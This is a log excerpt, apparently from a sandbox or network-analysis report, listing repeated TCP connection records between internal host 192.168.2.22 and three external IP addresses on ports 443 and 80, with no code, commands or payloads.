Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443

Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49162
